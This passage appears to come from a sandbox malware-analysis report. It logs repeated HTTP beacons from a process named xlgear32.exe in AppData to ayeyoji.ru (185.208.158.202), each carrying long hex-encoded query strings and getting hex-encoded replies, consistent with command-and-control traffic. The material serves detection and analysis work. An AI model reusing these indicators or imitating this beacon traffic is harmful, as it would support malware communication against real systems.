    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Nov 30, 2024 02:33:53.701723099 CET | 317 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:33:54.179733038 CET | 1084 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:33:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 33 36 63 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 62 37 36 35 62 62 33 37 34 66 30 36 37 62 37 33 32 35 36 63 30 65 30 64 35 30 65 63 61 34 32 63 64 37 64 62 30 31 62 66 64 33 32 38 38 33 38 65 33 31 36 62 38 36 37 63 37 35 61 61 35 65 61 34 65 65 37 35 62 37 66 34 33 65 63 32 66 36 36 39 34 33 64 37 39 38 63 66 66 31 32 64 65 65 64 39 30 39 39 32 35 63 39 36 61 39 63 31 33 64 38 35 30 38 66 32 31 62 37 35 30 62 36 66 37 35 65 32 39 65 34 36 35 64 62 66 34 36 37 62 30 38 39 65 35 64 30 34 61 65 36 33 35 63 38 31 35 33 30 34 33 35 62 32 38 65 32 33 62 37 33 30 66 37 38 62 38 65 63 38 34 66 34 38 37 32 64 35 31 65 36 35 37 37 32 32 33 65 30 32 63 35 65 65 39 66 64 65 36 38 64 65 34 33 66 37 65 61 37 65 37 34 32 39 32 38 34 66 62 37 31 32 36 31 [TRUNCATED]
                                                                        Data Ascii: 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
Nov 30, 2024 02:33:57.749596119 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:33:58.262341976 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:33:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Nov 30, 2024 02:33:58.375155926 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:33:58.844825029 CET | 940 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:33:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 32 64 63 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 63 38 66 63 66 66 35 31 65 31 39 65 62 62 64 35 35 65 39 30 33 63 61 66 66 38 64 65 37 39 35 38 37 34 64 38 30 34 37 64 31 65 34 64 63 32 61 33 30 61 31 35 32 66 66 64 36 63 64 30 37 32 39 65 39 37 64 35 39 61 64 37 35 66 36 36 63 61 38 33 32 35 33 64 65 66 63 64 33 30 62 64 65 34 31 63 38 37 65 61 65 31 34 66 61 33 39 38 66 32 36 65 34 31 30 61 64 36 37 63 63 35 36 61 35 65 32 34 36 65 34 34 34 37 36 34 61 66 32 32 64 36 31 39 66 33 65 36 37 38 65 66 34 31 30 63 33 65 61 38 62 39 62 33 33 63 63 37 31 39 37 31 31 63 36 35 31 38 66 32 33 62 63 35 38 62 33 65 39 35 66 32 61 65 34 37 39 63 63 66 62 37 61 61 37 38 65 65 65 64 34 35 34 65 37 33 62 63 61 31 63 33 30 35 64 35 61 32 30 65 38 32 34 37 33 30 62 37 38 62 38 65 62 38 66 65 30 38 37 32 64 35 39 66 38 35 64 37 31 32 30 66 65 32 61 35 64 66 63 66 64 65 33 38 65 65 34 33 66 37 38 61 36 66 33 34 35 39 33 38 36 65 35 37 62 32 35 31 [TRUNCATED]
                                                                        Data Ascii: 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


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49746 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:33:59.198496103 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:00.572812080 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49752 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:00.806781054 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:02.227019072 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49758 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:02.467372894 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:03.916752100 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Nov 30, 2024 02:34:04.031367064 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:04.493899107 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Nov 30, 2024 02:34:04.608022928 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:05.065917969 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49764 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:05.415508986 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:06.739707947 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49770 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:06.978771925 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:08.320300102 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49771 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:08.556945086 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:09.935836077 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49777 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:10.182204008 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:11.556437969 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49783 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:11.791414022 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:13.226771116 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49788 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:13.462992907 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:14.944133997 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49790 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:15.181719065 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:16.553778887 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49795 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:16.791323900 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:18.165915012 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49800 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:18.401058912 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:19.841476917 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49803 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:20.089040995 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:21.511260986 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Nov 30, 2024 02:34:21.624417067 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:22.101311922 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49809 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:22.510927916 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:23.884879112 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49814 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:24.176803112 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:25.556432009 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49820 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:25.791766882 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:27.189121008 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49825 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:27.432925940 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:28.850276947 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49828 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:29.087987900 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:30.470597982 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
